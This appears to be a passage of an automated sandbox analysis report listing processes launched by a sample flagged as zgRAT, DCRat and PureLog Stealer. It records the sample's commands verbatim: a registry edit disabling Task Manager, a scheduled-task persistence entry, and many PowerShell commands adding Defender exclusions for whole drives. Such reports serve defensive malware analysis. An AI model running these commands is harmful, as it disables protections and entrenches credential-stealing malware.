                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:20:22:22
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                          Imagebase:0x710000
                                                          File size:59'392 bytes
                                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:20:22:22
                                                          Start date:30/12/2024
                                                          Path:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\fontdriversavescrt/ComComponentDriverInto.exe"
                                                          Imagebase:0x490000
                                                          File size:2'039'296 bytes
                                                          MD5 hash:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000000.1944436604.0000000000492000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.2200435861.000000001299D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\fontdriversavescrt\ComComponentDriverInto.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\fontdriversavescrt\ComComponentDriverInto.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 78%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:20:22:25
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline"
                                                          Imagebase:0x7ff609b70000
                                                          File size:2'759'232 bytes
                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:20:22:25
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:20:22:25
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC076.tmp" "c:\Windows\System32\CSC2AA1D359FACC4CB2A858F49C46B13997.TMP"
                                                          Imagebase:0x7ff631da0000
                                                          File size:52'744 bytes
                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:19
                                                          Start time:20:22:25
                                                          Start date:30/12/2024
                                                          Path:C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
                                                          Imagebase:0x3a0000
                                                          File size:2'039'296 bytes
                                                          MD5 hash:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 78%, ReversingLabs
                                                          • Detection: 60%, Virustotal
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:20
                                                          Start time:20:22:25
Start date: 30/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default User\Documents\sihost.exe'" /rl HIGHEST /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 22
Start time: 20:22:25
Start date: 30/12/2024
Path: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
Imagebase: 0x190000
File size: 2'039'296 bytes
MD5 hash: 715951FB52F5F8D7603E8E2B1DB98A4D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 34
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 35
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 36
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 37
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 38
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 39
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 40
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontdriversavescrt/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 41
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 42
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 43
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 44
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 45
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 46
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 47
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 48
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 49
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 50
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 51
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 52
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 53
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 54
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 55
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 56
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 57
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 58
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 59
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\WmiPrvSE.exe'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 60
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 61
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 62
Start time: 20:22:26
Start date: 30/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Documents\sihost.exe'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:63
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:64
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:65
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:66
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\ComComponentDriverInto.exe'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:67
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:68
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:69
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:70
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:71
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:72
                                                          Start time:20:22:27
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\h43HaGdPC8.bat"
                                                          Imagebase:0x7ff7a37f0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:73
                                                          Start time:20:22:28
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:74
                                                          Start time:20:22:29
                                                          Start date:30/12/2024
                                                          Path:C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe
                                                          Imagebase:0xd50000
                                                          File size:2'039'296 bytes
                                                          MD5 hash:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 78%, ReversingLabs
                                                          • Detection: 60%, Virustotal
                                                          Has exited:true

                                                          Target ID:75
                                                          Start time:20:22:29
                                                          Start date:30/12/2024
                                                          Path:C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe
                                                          Imagebase:0xf10000
                                                          File size:2'039'296 bytes
                                                          MD5 hash:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:76
                                                          Start time:20:22:30
                                                          Start date:30/12/2024
                                                          Path:C:\Users\Default\Documents\sihost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\Default User\Documents\sihost.exe"
                                                          Imagebase:0xbd0000
                                                          File size:2'039'296 bytes
                                                          MD5 hash:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\Documents\sihost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Documents\sihost.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 78%, ReversingLabs
                                                          • Detection: 60%, Virustotal
                                                          Has exited:true

                                                          Target ID:77
                                                          Start time:20:22:30
                                                          Start date:30/12/2024
                                                          Path:C:\Users\Default\Documents\sihost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\Default User\Documents\sihost.exe"
                                                          Imagebase:0x7a0000
                                                          File size:2'039'296 bytes
                                                          MD5 hash:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:78
                                                          Start time:20:22:31
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff61afd0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:79
                                                          Start time:20:22:35
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\w32tm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          Imagebase:0x7ff7e9310000
                                                          File size:108'032 bytes
                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:81
                                                          Start time:20:22:43
                                                          Start date:30/12/2024
                                                          Path:C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
                                                          Imagebase:0xa70000
                                                          File size:2'039'296 bytes
                                                          MD5 hash:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:82
                                                          Start time:20:22:48
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                          Imagebase:0x7ff693ab0000
                                                          File size:496'640 bytes
                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                          Has elevated privileges:true
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false


                                                            Execution Graph

                                                            Execution Coverage:9.9%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:10.2%
